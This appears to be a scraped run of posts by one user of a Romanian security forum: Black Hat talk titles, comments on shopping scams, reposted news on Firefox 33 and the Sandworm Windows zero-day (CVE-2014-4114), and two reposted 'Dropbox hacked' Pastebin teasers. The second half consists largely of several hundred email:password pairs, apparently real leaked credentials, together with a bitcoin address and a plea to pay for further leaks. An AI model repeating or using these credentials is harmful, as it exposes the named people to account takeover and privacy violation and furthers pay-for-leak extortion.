Nytro

[h=1]Black Hat USA 2014 - AppSec: SVG Exploiting Browsers without Image Parsing Bugs[/h]

[h=1]Black Hat USA 2014 - AppSec: Pivoting in Amazon Clouds[/h]

Ok, lucrurile stau cam asa: Arrow Electronics, cei care sunt "partenerii" lor, au sediu in Cluj. Tocmai am sunat acolo si din start mi s-a spus "Aoleu, fabrica de discounturi?" . Adica nu sunt primul care a sunat si mi-au confirmat ca nu stiu nimic de vreun parteneriat cu site-ul respectiv. Adica e teapa. In caz ca inca nu v-ati convins de acest lucru.

Da, misto. Pacat ca se duc zilele in care stateai cu F7/F8 pana nenoroceai tastele.

De cele mai multe ori, ceea ce pare "prea frumos ca sa fie adevarat", chiar asa e. Nu inteleg mania asta a "ofertelor". << iPhone 7 Supreme la 200 RON >> - Ganditi si voi inainte de a arunca niste bani. Nu degeaba "brand-ul costa". Brand-ul (Apple Store sau cum s-o numi) iti ofera anumite garantii pe care "Fabrica de vise umede" nu ti le ofera. E riscul vostru.

Nu ne asumam raspunderea pentru eventuale tepe. Faceti "afaceri" doar cu userii care au cel putin 50 de posturi, astfel aveti sanse mari sa nu mai fi dat o teapa. In plus, din posturile sale va puteti da seama daca e o persoana serioasa sau un cocalar care s-ar fute in cur cu degetul pentru 5 dolari.

Da, misto ideea cu modulul de kernel care urmareste "pachete magice" in PREROUTING.

Firefox 33 arrives with OpenH264 support, sending video to Chromecast and Roku from Android October 14, 2014 8:45 AM Emil Protalinski Mozilla today officially launched Firefox 33 for Windows, Mac, Linux, and Android. Major additions include OpenH264 support as well as the ability to send video content from webpages to a second screen. Firefox 33 for the desktop is available for download now on Firefox.com, and all existing users should be able to upgrade to it automatically. As always, the Android version is trickling out slowly on Google Play. Desktop The biggest addition for the desktop platforms is OpenH264 sandboxed support via Cisco’s H.264 open source H.264 implementation. Thanks to the networking company, Firefox can now decode and encode the video compression format (for WebRTC, but not the video tag yet) without Mozilla having to pay MPEG LA license fees. “Cisco is excited to see OpenH264 become available to Firefox users, who will then benefit from interoperability with the millions of video communications devices in production that support H.264,” Jonathan Rosenberg, Cisco’s Chief Technology Officer for Collaboration, said in a statement. Firefox likely won’t be the only major application to support OpenH264, but it’s the first. Search has gotten a boost as well: it’s faster via the location bar, and there are now suggestions on the Firefox Start and new tab pages. Mozilla may not have Google’s search chops, but Firefox regularly gets improvements in this department. Video and search aside, here’s the full Firefox 33 changelog: New: Windows: OMTC enabled by default. New: OpenH264 support (sandboxed). New: Improved search experience through the location bar. New: Slimmer and faster JavaScript strings. New: Search suggestions on the Firefox Start (about:home) and new tab (about:newtab) pages. New: New CSP (Content Security Policy) backend. New: Support for connecting to HTTP proxy over HTTPS. New: Improved reliability of the session restoration. New: Azerbaijani [az] locale added. Changed: Proprietary window.crypto properties/functions removed. Changed: JSD (JavaScript Debugger Service) removed in favor of the Debugger interface. HTML5: DOMMatrix interface implemented. HTML5: @counter-style rule from CSS3 Counter Styles specification implemented. Developer: Cubic-bezier curves editor. Developer: Display which elements have listeners attached. Developer: New sidebar which displays a list of shortcuts to every @media rule in the current stylesheet. Developer: Paint flashing for browser content repaints. Developer: Editable @keyframes rules in the Rules section of the Inspector. Developer: CSS transform highlighter in the style-inspector. Fixed: Fix incomplete downloads being marked as complete by detecting broken HTTP1.1 transfers (237623). If you’re a Web developer, you may want to get more details at the Firefox 33 for developers page. Android Mozilla has been working on various multi-screen capabilities for its Android app over the last few months, and today’s addition takes another big step. Sending video content from webpages to a second screen is now available via a new “send to device” option. If a video can be sent over, an indicator will appear (after any ads have played) on the playback controls bar. Tapping it will bring up a list of Chromecast and Roku devices on the same Wi-Fi network. A second “send to” indicator also shows up in the URL bar to remind users that content from this webpage is being sent to a device: You can play, pause, and close videos directly within Firefox for Android via the new Media Control Bar, which appears at the bottom of your phone’s screen when a video is being sent to a device. The bar will stay visible as long as the video is playing, even as you change tabs or visit new webpages. Here’s how to use the new feature: Make sure your Chromecast or Roku is set up on a nearby TV and is running on the same Wi-Fi network as your Android phone. If streaming to a Roku, add the Firefox channel to the channel list (instructions). Pick a video to play on a website and look for the “Send to” icon over the video controls or in the URL bar to send it to your streaming device. Either option will automatically activate Chromecast for streaming launch or the Firefox channel on Roku. There are some notable limitations. The video will only play if the device receiving it supports the same video format as what is being viewed on Firefox for Android. In some cases, a website will hide or customize the HTML5 video controls or override the video playback menu. To get around this, Mozilla recommends starting the video on the page and using the “Send to Device” button in the URL bar. Here’s the full Firefox 33 for Android changelog: New: Sending videos to Chromecast and Roku devices. New: Option added to clear data when quitting. New: Enhanced tab management. New: Slimmer and faster JavaScript strings. New: New CSP (Content Security Policy) backend. New: Form elements updated to a more modern look. New: Locales added: Aragonese [an], Frisian [fy-NL], Kazakh [kk] and Khmer [km]. HTML5: DOMMatrix interface implemented. HTML5: @counter-style rule from CSS3 Counter Styles specification implemented. HTML5: Support for the ECMAScript 6 Symbol data type added. Developer: Paint flashing for browser content repaints. The third point is worth expanding on. Firefox for Android users can now undo a closed tab, view recently closed tabs, and even close all tabs at once. New versions of Firefox are released approximately every six weeks. Firefox 34 will be out in late November. Sursa: Firefox 33 arrives with OpenH264 support, sending video to Chromecast and Roku from Android | VentureBeat | News Briefs | by Emil Protalinski

Am dori de asemenea si niste dovezi ca ai fost tepuit.

Cica ar avea 7 milioane. Deci probabil acces la baza lor de date.

Microsoft Windows Zero-Day Vulnerability "CVE-2014-4114" Used to Hack NATO Once again a Russian cyber espionage group has gained media attention by exploiting a Zero-day vulnerability in Microsoft’s Windows operating system to spy on the North Atlantic Treaty Organization (NATO), Ukrainian and Polish government agencies, and a variety of sensitive European industries over the last year. ZERO-DAY VULNERABILITY IN MICROSOFT WINDOWS Researchers at cyber intelligence firm iSight Partners have discovered a zero-day vulnerability that impacts desktop and server versions of Windows, from Vista and Server 2008 to current versions. They also uncovered a latest cyber-spying campaign - suspected to be based in Russia - that uses this Zero-day vulnerability (CVE-2014-4114) to target government leaders and institutions for nearly five years. The recently detected Russian hacking group is dubbed as "Sandworm Team" by iSIGHT Partners because it found references to the Frank Herbert's "Dune" science fiction series in the malicious software code used by the Russian hackers. THE NOTORIOUS ZERO-DAY The zero-day vulnerability is "An exposed dangerous method vulnerability exists in the OLE package manager in Microsoft Windows and Server" that "allows an attacker to remotely execute arbitrary code," according to the report. "The vulnerability exists because Windows allows the OLE packager (packager .dll) to download and execute INF files," iSight Partners writes. "In the case of the observed exploit, specifically when handling Microsoft PowerPoint files, the packagers allows a Package OLE object to reference arbitrary external files, such as INF files, from untrusted sources. This will cause the referenced files to be downloaded in the case of INF files, to be executed with specific commands." The Russian hacking group is probably working for the government and has been active since at least 2009 and, according to iSight Partners, the cyber espionage campaign is still ongoing. The intelligence firm began monitoring the hackers’ activity in late 2013 and discovered the zero-day vulnerability in late August. It "discovered a spear-phishing campaign targeting the Ukrainian government and at least one United States organization" during the NATO summit in Wales, where member states discussed Russia’s actions in Ukraine. "On September 3rd, our research and labs teams discovered that the spear-phishing attacks relied on the exploitation of a zero-day vulnerability impacting all supported versions of Microsoft Windows (XP is not impacted) and Windows Server 2008 and 2012," iSight writes. "A weaponized PowerPoint document was observed in these attacks. Though we have not observed details on what data was exfiltrated in this campaign, the use of this zero-day vulnerability virtually guarantees that all of those entities targeted fell victim to some degree." MICROSOFT TO RELEASE PATCH SOON The threat intelligence firm said it reported the critical zero-day vulnerability to the Microsoft Corp. and held off on disclosing the problem so that the software maker had time to fix the flaw. Microsoft plans to release a patch for the vulnerability on Tuesday patch in security bulletin MS14-060, as part of its monthly “Patch Tuesday” — an organized release of patches to vulnerabilities in the company’s software. A Microsoft spokesman said the company plans to roll out an automatic update to the affected versions. Sursa: Microsoft Windows Zero-Day Vulnerability "CVE-2014-4114" Used to Hack NATO

[h=1]Russian hackers target NATO, Ukraine and others: iSight[/h] By Jim Finkle BOSTON Tue Oct 14, 2014 12:05am EDT (Reuters) - Russian hackers exploited a bug in Microsoft Windows and other software to spy on computers used by NATO, the European Union, Ukraine and companies in the energy and telecommunications sectors, according to cyber intelligence firm iSight Partners. ISight said it did not know what data had been found by the hackers, though it suspected they were seeking information on the Ukraine crisis, as well as diplomatic, energy and telecom issues, based on the targets and the contents of phishing emails used to infect computers with tainted files. The five-year cyber espionage campaign is still going on, according to iSight, which dubbed the operation "Sandworm Team" because it found references to the "Dune" science fiction series in the software code used by the hackers. The operation used a variety of ways to attack the targets over the years, iSight said, adding that the hackers began only in August to exploit a vulnerability found in most versions of Windows. ISight said it told Microsoft Corp about the bug and held off on disclosing the problem so the software maker had time to fix it. A Microsoft spokesman said the company plans to roll out an automatic update to affected versions of Windows on Tuesday. There was no immediate comment from the Russian government, NATO, the EU or the Ukraine government. Researchers with Dallas-based iSight said they believed the hackers are Russian because of language clues in the software code and because of their choice of targets. "Your targets almost certainly have to do with your interests. We see strong ties to Russian origins here," said John Hulquist, head of iSight's cyber espionage practice. The firm plans to release a 16-page report on Sandworm Team to its clients on Tuesday. While technical indicators do not indicate whether the hackers have ties to the Russian government, Hulquist said he believed they were supported by a nation state because they were engaging in espionage, not cyber crime. For example, in December 2013, NATO was targeted with a malicious document on European diplomacy. Several regional governments in the Ukraine and an academic working on Russian issues in the United States were sent tainted emails that claimed to contain a list of pro-Russian extremist activities, according to iSight. The firm said its researchers uncovered evidence that some Ukrainian government computer systems were infected, but they were unable to remotely confirm specific victims among those systems that had been targeted. Still, researchers believe a large percentage of those targeted systems were infected because the malicious software used was very sophisticated, using a previously unknown attack method that enabled it to get past virtually all known security protections, said Drew Robinson, a senior technical analyst with iSight Partners. ISight said it had alerted some victims of Sandworm Team, but declined to elaborate. The iSight research is the latest in a series of private sector security reports that link Moscow to some of the most sophisticated cyber espionage uncovered to date. Russia's Kaspersky Lab in August released details on a campaign that attacked two spy agencies and hundreds of government and military targets across Europe and the Middle East. (Reporting by Jim Finkle; Additional reporting by Alastair Macdonald; Editing by Tiffany Wu) Sursa: Russian hackers target NATO, Ukraine and others: iSight | Reuters Altele: Russian 'Sandworm' Hack Has Been Spying on Foreign Governments for Years | WIRED

Dropbox Hack Second Teaser. As promised here is another batch of Hacked Dropbox accounts from close to 7 million total hacked accounts. We will keep releasing more to the public as donations come in, show your support. Send bitcoin donations to 1Fw7QqUgzbns7yWHH32UnmMxmMMwu6MC6h Enjoy! More to come. As previously, all Dropbox logins are in the same format, login:Password Bille97@hotmail.com:billebille Billelsaddi@hotmail.com:270189 Billenann@hotmail.com:heyhey Billetes_cachanilla@hotmail.com:billetes Billewanchuk@shaw.ca:carebear Billflana@yahoo.com:7612bf Billfulk@hotmail.com:6970bf Billglez@yahoo.com:chicos Billgrandy@hotmail.com:hall04 Billibelle@hotmail.com:ocareh Billiboy17@hotmail.com:jordan23 Billy_j_7@hotmail.com:b1i9l7l3y Billykaelin@hotmail.com:billy73 Bilo23@yahoo.es:bilo78 Bimes91@yahoo.com:jesusis Bimsmendoza@yahoo.com:tenement Bin1651@hotmail.com:16513219 Bingo983@hotmail.com:goldie Binjamin24@aol.com:walter1214 Bintangvenus@yahoo.com:140960 Biohazz@hotmail.com:tjgm151284 Biolina@hotmail.com:faby8481 Biowizard@gmail.com:123abc Birdman_1984@yahoo.com:045343 birdman8704@hotmail.com:simtekonnen Birgit.bruylandt@arteveldehs.be:rob260600 Birgit.frankenberg@verizon.net:$aries78 Birgit.hamrich@gmx.net:syrxhacht Birmad@msn.com:mushtaaq Birziete@hotmail.com:stica3 Bisfish@gmail.com:guitar76 Bissonchris@hotmail.com:ricards Bissyjanuplatho@yahoo.com:255043 Bitofr2001@yahoo.fr:jardiland Bixente55@hotmail.com:lizarazu bixkuitero@hotmail.com:paputxio bj_predator_0919@yahoo.com:Angeluz Bj_witkowski@hotmail.com:13056956 Bjawesterman@yahoo.co.uk:oombart bjornullstrom@hotmail.com:weecweec Bjpeters02@gmail.com:hatsbears Bkavin@earthlink.net:huxley17 Bkchow81@hotmail.com:2885031 Bkocagil@yahoo.ca:psygno Bkrs505@aol.com:daisy1 Blabeybaby@yahoo.com:23papa23 Black_stone03@hotmail.com:2878256 Blackboy_di@hotmail.com:farnshu Blackchain_1@hotmail.com:sl1pkn0t Blackjack0512@hotmail.com:1417170513 blackkid1983@yahoo.com:maggie Blacklemon88@hotmail.com:coolkid blackmasta@gmail.com:moomoo blackmessa@msn.com:dhtvirus Blackmin@hotmail.com:cortina Blackmisuper2@yahoo.com.hk:ascszh5m Blackmon41@aol.com:dizzy41 blacknigi@yahoo.com:mercury Blackninj@hotmail.com:john0000 Blackninja_tj@hotmail.com:75167516 Blackninjarat@hotmail.com:thailand blacknite_tk@hotmail.com:psalms23 Blacknova81@aol.com:virgo81 blacknsilver337@msn.com:a250racer Blackout2@shaw.ca:mantra Blackoutproduct@yahoo.com:dxsuckit blackpearlcandy@hotmail.com:christmas Blackpink_ganaa@yahoo.com:kj911111 Blackpit@ish.de:DB2000 Blackpool3@aol.com:spiegel Blackporsche82@yahoo.com:gsxr1100 blackpower007@hotmail.com:4142black Blackprinceatfvsu@yahoo.com:cascade Blackprincerich@hotmail.co.uk:wedding74 blackprincess_972@msn.com:080289 Blackproductionsent@yahoo.com:mr.black Blackragnarok@hotmail.com:062408 Blackraven15@yahoo.com:ironroof71 Blacks9885@yahoo.com:642590 Blacksandrine@hotmail.com:paperbooks Blackshuck_84@hotmail.com:loveisonlyafeeling Blacksmhong@hotmail.com:justain1 Blackspiderent@yahoo.com:biglifes Blackstar189@hotmail.com:afrika Blackstar58_8@hotmail.com:jazmin Blackstarfallen@hotmail.com:smoochies Blacksteele2002@yahoo.com:sandman Blackstone_241@hotmail.com:hotmail Blackstyle99@gmail.com:Ardfac1! Blacktone234@yahoo.com:uhyeah Blacktowergirl@hotmail.co.uk:munchies Blacktrognon94@msn.com:tapasima Blackwater_2k@yahoo.com:786786 Blackwel@etsu.edu:bearclaw Blacky1981@aol.com:hershey Blackzeal101@yahoo.com:ojay231 Bladdersplatter@gmail.com:shadow1982 Bladdy_007@hotmail.com:014252426 blade_ryka@hotmail.com:boat90 Bladefast@gmail.com:mama3ayno Via: DROPBOX.COM Hacked Second Teaser - Pastebin.com Altele: http://pastebin.com/NtgwpfVm Altele: http://pastebin.com/CsN3SrGA

***** DROPBOX HACKED ***** 6,937,081 DROPBOX ACCOUNTS HACKED PHOTOS - VIDEOS - OTHER FILES MORE BITCOIN = MORE ACCOUNTS PUBLISHED ON PASTEBIN As more BTC is donated , More pastebin pastes will appear To find them, simply search for "DROPBOX HACKED" and you will see any additional pastes as they are published. FIRST TEASER - 400 DROPBOX ACCOUNTS Just to get things going... SEND BTC DONATIONS TO 1Fw7QqUgzbns7yWHH32UnmMxmMMwu6MC6h COME BACK AND CHECK PASTEBIN FOR NEW DROPBOX DROPS THE MORE BTC DONATED WILL REFLECT HOW MANY MORE LOGIN AND PASSWORDS ARE RELEASED PUBLIC. START OF DROPBOX HACKED ACCOUNT LOGIN AND PASSWORDS Benitacran@btinternet.com:choochoo123 benitaokagbue@hotmail.com:87onaedo Benitesleo@hotmail.com:19761976 Benitez.paulina@gmail.com:buenitez Benitez_ja@hotmail.com:juan4848 Benitez11@hotmail.com:cienypop Benitez7288@hotmail.com:05311984 Beniteznadia@yahoo.com:what1212 Benitezotefuites@hotmail.com:alejandra Benitezrulez@hotmail.com:15412872 benito_mendes@yahoo.com:junior33 Benito2000@hotmail.com:rastapodja Benito214@hotmail.com:putavida Benitoarturo@hotmail.com:250185 Benitocortes@hotmail.com:tigres Benitomtz@hotmail.com:bmg0530 Benitoprosper@hotmail.com:001971 benitopuga@hotmail.com:3564472 Benitorsc@hotmail.com:21282128 Benitotrento@hotmail.com:1985bltr Benitto@prodigy.net.mx:durcka Benitza27@hotmail.com:lucero13 Beniville@yahoo.co.uk:france Benj_mousquet@hotmail.com:060982 Benja_2020@hotmail.com:thebest4 Benja_2307@hotmail.com:benjaminlls Benja_camos91@hotmail.com:6071991 Benja_camus@hotmail.com:ergosum Benja1982@hotmail.com:xr3y20 Benjaboonchar@hotmail.com:bugoff Benjackson666@hotmail.com:otford666 benjalinares@hotmail.com:cuca1983 Benjames171@hotmail.com:scoopex Benjamim.82@gmail.com:erptlxb Benjamim_ramos@hotmail.com:fisicadez Benjamin.blakely@gmail.com:kamikaze Benjamin.foissey@wanadoo.fr:simbamartin Benjamin.jensen@gmail.com:74459597 Benjamin.koon@gmail.com:funkadelic Benjamin.lasserre@free.fr:ben0780 Benjamin.moll@gmail.com:bmNW8ORE Benjamin.osborne@gmail.com:osborne42 Benjamin.saur@hotmail.com:spanien Benjamin.vignot@gmail.com:13241324 Benjamin.wood@gartner.com:brw98001 Benjamin@italiaander.org:labouroflove benjamin@octa4.net.au:Helen67 Benjamin@resolvefilms.com:woodson Benjamin@schlechter.net:deneke17 Benjamin@uyttebroeck.net:ikbedoel Benjamin_5566@hotmail.com:236789 Benjamin_abtan@yahoo.fr:israel Benjamin_bisschops@hotmail.com:polleken Benjamin_bunting@hotmail.com:guitar Benjamin_cheng_yong@yahoo.com.sg:280679 benjamin_cornu@hotmail.com:05041979 benjamin_james_harrison@yahoo.co.uk:2bornot2b Benjamin_keane@hotmail.com:presice55 Benjamin_kek@hotmail.com:b3nk3k Benjamin_kkc@hotmail.com:benkhoo1 Benjamin_m@metrixlab.com.mx:bemen9 Benjamin_monroe1@yahoo.com:sithspawn Benjamin_nielsen@hotmail.com:den1560 Benjamin_niemczyk@hotmail.com:Benji1999 Benjamin_ordonez@hotmail.com:59800599 Benjamin_parry@yahoo.com.au:476530 benjamin_pasquier@hotmail.com:romulus benjamin_plw@yahoo.com:301272 Benjamin_pop@hotmail.com:pumpkins benjamin_preacher@yahoo.com:frankl1n Benjamin_quicq@hotmail.com:cesar22 Benjamin_song@hotmail.com:8814137e benjamin_tan86@hotmail.com:99041ben benjamin_vanlaere@hotmail.com:14everything Benjamin_whitehead@yahoo.com:nwanda Benjamin2292@hotmail.com:be2292 Benjamin2606@hotmail.com:26061983 Benjamin2625@hotmail.com:26910441 Benjamin988@hotmail.com:ke4g5v Benjaminarnaud@hotmail.com:mercedes Benjaminaznar@hotmail.com:00047950 Benjaminbarros@gmail.com:bb7335 Benjaminbayard@hotmail.com:451100 Benjaminbuttier@hotmail.com:visavisa Benjaminchandler@gmail.com:merkurydrop Benjamincody@yahoo.com:86753099 Benjamincompton@hotmail.com:notthatbad Benjamincwh123@hotmail.com:xdhhnvi Benjamindonati@hotmail.com:andycole Benjamine_89@hotmail.com:kanontw Benjaminemmanuelsmith@hotmail.com:vedder Benjaminferguson@hotmail.com:felix123 Benjamingaunt@hotmail.com:cabria757 Benjaminguillen86@hotmail.com:baterya benjaminhui@hotmail.com:mj2323 Benjaminjais@hotmail.com:ttnouvo Benjaminkheng@hotmail.com:lovediary benjaminlujan@yahoo.com:omarin79 Benjaminman7@hotmail.com:senisevi Benjaminmccarthy@hotmail.com:holdenEH Benjaminmyoung@hotmail.com:wertre Benjaminplouvier555@hotmail.com:indiana Benjaminpquest@yahoo.com:ques120475t Benjaminroccomammola@hotmail.com:quovadis benjaminroger@yahoo.com:rogbenjiifj Benjamins101@yahoo.com:Benjam!ns101 Benjaminsean@hotmail.com:burton Benjamintanjb@hotmail.com:bentjb Benjamintarraf@hotmail.com:BenTarkan83 Benjaminvdw@yahoo.com:bibi994x Benjaminvisser@hotmail.com:arend-jan Benjaminvonmatt@hotmail.com:satan81 Benjaminw6633@hotmail.com:elderman Benjaminwauman@hotmail.com:swasentnuf benjamin-winter@gmxpro.de:Knopex3553 Benjaminzhou@yeah.net:62573342 Benjaminzvidzai@yahoo.co.uk:gracez Benjammin95@hotmail.com:helicopter Benjamonjuarez@msn.com:benjamon Benjapintoe@hotmail.com:teoteo Benjapol29@hotmail.com:2937527 Benjcanfield@yahoo.com:cizzle Benjebola@hotmail.com:clue4184 Benjellounsimo@hotmail.com:hercule Benji_192@hotmail.com:checkm8te Benji_chai@hotmail.com:asshole Benjicheah@hotmail.com:benjic Benjieaclan@yahoo.com:benjie benjin12480@hotmail.com:iobe1710 Benjitawx@hotmail.com:benjalminha Benjitenerife@hotmail.com:100682 Benjnielsen@hotmail.com:single benjrouse@hotmail.com:woodson Benjsoares@hotmail.com:0055500 Benjy_morgan@hotmail.com:dongding Benjy_zgr8@hotmail.com:noknok Benjy172002@hotmail.com:socceroos Benke.huygaerts@gmail.com:bhdfq770 Benkendall@hotmail.com:benjamin Benkeny2003@hotmail.com:bk6859 Benkham00@hotmail.com:8329100a Benkoh228@hotmail.com:master12 Benkolls@hotmail.com:Dungeon benkrecke@hotmail.com:iamthedude Benkurrein@hotmail.com:try203b Benlan2000@hotmail.com:tongres15 Benlessard@hotmail.com:garsdpartys benloh221101@yahoo.com:221101 Benlokumaine@yahoo.fr:135615491a Benmack85@hotmail.com:leahmyers Benmakrelouf@hotmail.com:espoir benmatellini@hotmail.com:matigog926 Benmcgregor131@hotmail.com:yrustupid Benmicolon@hotmail.com:2382935 Benminter@yahoo.co.uk:m111ter Benmodeste@hotmail.com:Modsjnr Bennetsteve@hotmail.com:420harry Bennett.alice@gmail.com:641990 Bennett_paul@hotmail.com:ireland Bennett290@hotmail.com:pppppp Bennettgraham1@yahoo.co.uk:dexter1cat Benni_blanco@hotmail.com:preacher Bennichols01@hotmail.com:bnichols benniehoekstra@hotmail.com:90370724 Bennies_sos@hotmail.com:024393266 Bennun@optonline.net:rb1971 Benny@dataport.no:58igoisp Benny_thomas21@yahoo.co.in:finnis23 Benny_wood@hotmail.com:kirsty42 Bennybabyty@gmail.com:thazhath bennylo77@hotmail.com:bunnylo Bennymoore98@hotmail.com:melbourne bennynsp@hotmail.com:eggegg Bennyschmidt12@yahoo.com:shannon1 Benoit.doumas@gmail.com:tr8un6ne Benoit.moine@gmail.com:falvy228 Benoit.robichaud@umontreal.ca:mazan00 benoitaupecle@hotmail.com:fraisier Benoy13@yahoo.com:berylben Benpierpoint@hotmail.com:sarahmay Benpryke@hotmail.com:mountier Benson_hoo@hotmail.com:williamso Benur.betty@gmail.com:guy5445079 Benvenables@talk21.com:viek3m Benver@gmail.com:tarres Benwesthead140@hotmail.com:17091978 Benwhiffin@hotmail.com:271188 benwong_99@yahoo.com:bennyboy Benzito007@hotmail.com:nigger beong1@hotmail.com:kiekeboe Beont@hotmail.com:zerozero Bepelegri@hotmail.com:tatata Beqoool@hotmail.com:ludipine berardinelli_32@hotmail.com:amigos Berdine_billen@hotmail.com:giraffe Bere_ms06@hotmail.com:271188 Beremunive@yahoo.com:berunfla berendbot@msn.com:botbot Berenicemg_7@msn.com:0096905 Bergquist_pia@hotmail.com:mikemus Berk.alpaslan@gmail.com:fenerbahce berkayaksoy@hotmail.com:ber1917 berkmekik@gmail.com:64176417 Berknopp@yahoo.com.br:fender1584 Berkseval@hotmail.com:34brk86 Bernadettema@gmail.com:zooeii28 Bernadtom@hotmail.com:promo2002 Bernaflip@hotmail.com:449854 Bernal_bb@hotmail.com:skalibur Bernal_maria@hotmail.com:7167red Bernardb@challenge-me.com:leeward Bernardchan74@hotmail.com:bcby2919 Bernardduggan@yahoo.co.uk:batboy1 Bernardoch2@hotmail.com:104243 Bernardstuyven@hotmail.com:pellen82 bernardtts@yahoo.com:62778894 Bernardwheatley@yahoo.com.au:grubster Bernardwieg@hotmail.com:biertje Bernd_de_marrez@hotmail.com:baloncesto Bernd_kolb@hotmail.com:vergessen Bernhard.warr@gmail.com:badjga9! Bernhardrepa@gmx.at:gringoloco Bernie.dzt@free.fr:Csa2aRrS Bernie.kan@gmail.com:19851985 bernie_m2@hotmail.com:dancing berntis@excite.com:ormex318 Berrind2003@yahoo.com:karakoca Berry_oonincx@msn.com:disturbed Berry99@hotmail.com:confident Berryko@hotmail.com:tarantoo Bert0023@hotmail.com:bert46bert Bertderooij@planet.nl:b1958dr berteken@hotmail.com:bert1978 Berthapet@citromail.hu:bertha1 Bertiewonder@hotmail.com:Bertie.1der Bertillybilly@hotmail.com:tweeling Bertlee12@gmail.com:dt12nc Bertozapata@ya.com:918157597 Berzegerol@hotmail.com:berzeg77 Besizh@hotmail.com:velipoja Besmeh@gmail.com:ze2neh Besnistos@yahoo.es:domingo Bessiechen@hotmail.com:610324 Bestank@yahoo.com:plumcouch bestfrank2020@hotmail.com:fbs753 Bet_buxo@yahoo.es:8668417 Betaaa@hotmail.com:beta1221 Betaguerra@hotmail.com:32686527 betalibardi@hotmail.com:libardi betasin@hotmail.com:filler Betgerisrinivas@hotmail.com:byadgi Beth_975@yahoo.com:Roxy0975 Beth_friel@hotmail.com:kyla1111 beth879@hotmail.com:toffee Bethan27@hotmail.com:redwreck Bethanygabriela@hotmail.com:bgll861130 Bethanykipp@hotmail.com:promise Bethdelaney@hotmail.com:unlucky Bethfesarillo@yahoo.com:fuchsia Bethinhasp@hotmail.com:betinha1 Bethmoynahan@yahoo.com:Obi1knobi Betho12345@gmail.com:pinocho Beto_081091@hotmail.com:wather10 Beto_556_kenny@hotmail.com:233256 Beto_garza21@hotmail.com:Beto21rules Beto_santos21@hotmail.com:as1104 Beto2002@hotmail.com:96224030 Beto502@hotmail.com:0226020 Beto8683@hotmail.com:97560911 Betomat14@hotmail.com:slduffash Betoonlinemx@yahoo.com.mx:markxt Betopegler@hotmail.com:corinthians Betowolf@hotmail.com:betobh2 Betsilon82@hotmail.com:27051982 Bettina0104@hotmail.com:schippi Bettinablue50@hotmail.com:bsba5200 Bettinakalt@hotmail.com:bettinak Bettinazuercher@web.de:superstar Bettybirm@hotmail.com:finanzas Bettyboops75@hotmail.com:clic1975 Bettykabbabe@hotmail.com:160864 Betul_zer@hotmail.com:4327916 Betulchem@hotmail.com:5nisan1994 Betulsevcan@mynet.com:bs12356 Beu1986@hotmail.com:isabel Beudy1@hotmail.com:nikita beutenkristof@hotmail.com:djeezes bev68@personainternet.com:acerview Bevgeorgeesq@hotmail.com:theos0925 Bevin.marwa@gmail.com:creative Bewar_sindi@hotmail.com:8210boys Beware87@hotmail.com:puchyy Bexabo@hotmail.com:lollipop Beyikh@hotmail.com:tony2407 Bfbatey@yahoo.com:usafa02 Bfcbeda@yahoo.com.hk:saykenho Bfernandezc4@hotmail.com:060195 Bfernando@gmail.com:tmc123 bffbffbff@hotmail.com:781113 bfkzk@yahoo.com.br:musica bflow_1@msn.com:27892789 Bfoda@yahoo.com:habiba bgaliana@bellsouth.net:pepito Bgarantche@yahoo.fr:tintin1982 Bgaye04@yahoo.com:mase83 bgenkz@yahoo.com:rapidz Bggs15@hotmail.com:converse bghimel@yahoo.com.br:102608 bgjumawan@yahoo.com:bong4529 Bgpepper@xtra.co.nz:max9191 Bgrbkn@hotmail.com:001990 bh_malini@yahoo.co.in:water31 Bhamrick1313@gmail.com:pickle77 Bhan_arnuco@yahoo.com:bharon bhandariamal151@hotmail.com:123456 Bhanu919@yahoo.co.in:prakash Bhanuprathappn@rediffmail.com:kevlar Bharathbabug@gmail.com:orderoflove Bharti.choudhary@gmail.com:ohmygod1 bhaskar_malhotra@yahoo.com:bastard22 Bhaskargr@hotmail.com:anuradha Bhaswarpal@gmail.com:hetfield bhatiasanjeev76@yahoo.com:topatopa Bhavesh.bhathella@gmail.com:goldstar Bhavesh_chandrani@yahoo.com:bhshchra Bhavesh_pabari@yahoo.com:bmpabari bhavikgore@yahoo.com:bhavikgor123 Bhavnababulal@hotmail.com:135peptalk Bhavsusa@yahoo.com:spirit Bhavyabahadur@hotmail.com:forget Bhawesh_dandona@yahoo.co.in:madhu2002 bhawisha@hotmail.com:bhaw1sha Bhebekbloom@hotmail.com:orlando Bheras@hotmail.com:todoen Bhicks200416@sbcglobal.net:mother Bhkimy_7@hotmail.com:beyonce bhofmeister13@gmail.com:room13 Bholowasia@gmail.com:HmanuB11 Bhoneyman@hotmail.com:ev100100 Bhourey@hotmail.com:rashidul bhoy14@hotmail.com:lambert14 Bhs2005@hotmail.com:9540047 Bhtteo@hotmail.com:250677 Bhudia1@hotmail.com:iizdaman Bhuds_dj@yahoo.com:badi113 Bhulse57@hotmail.com:sunny7 Bhundel@yahoo.com:bhundel bhushan_m83@yahoo.com:woodbird Bhushan365@yahoo.com:bhu146715392 Bhushy_j@yahoo.com:ladybird Bhutiadw@yahoo.com:524477 Bhuv.guru@gmail.com:akshay1993 Bhuvneshshah@yahoo.co.in:brshah Bi_bulls@yahoo.com:l23456 Bi1999@hotmail.com:090981 Bia_afonso@hotmail.com:elefante bia_mansberger@hotmail.com:bibizoka Bia_otter@yahoo.com:birgitte82 bia_ros91@hotmail.com:biaros Bia8205@hotmail.com:211189 Bianca@cwpanama.net:diegoandre Bianca_cfp@hotmail.com:031294 Bianca_krist@hotmail.com:zzzzziggy Biancadamme@hotmail.com:bianca biancalana_l@hotmail.com:t4b7w9e2 Biancamkelly@hotmail.com:kelly11 Biancarf@uol.com.br:chanel biareinounido@hotmail.com:220787 Bibbylee@hotmail.com:naebdom Bibi_byrne@hotmail.com:kerijones Bibi_jcc@msn.com:rsuujewj Bibi11225@yahoo.com:dakanounou Bibi132@gmx.de:birgit1960 bibi3243@hotmail.com:verliefd bibianawllee@hotmail.com:hegemone Bibich74@hotmail.com:1741989 Bibie666@hotmail.fr:flipper Bibigo2003@yahoo.co.uk:skyhooks Bibimen@yahoo.com:*ldst3 Bibinantony@gmail.com:fadafad Bibleprophecy_ndbpsa@yahoo.com:patburns Bichobambino@hotmail.com:bichovino Bicus23@hotmail.com:bundudo Bidargaddi@gmail.com:08091401 Bidde_1@hotmail.com:wolfsnagen Bien_patrickbondoc@hotmail.com:00000777 Bierre45@hotmail.com:verres Big_and_bad_786@hotmail.co.uk:allah786 Big_m_style@hotmail.com:colordisk Big_up1996@hotmail.com:030983 bigal0604@hotmail.co.uk:naomianne Bigbadwoulfe@hotmail.com:nicolas 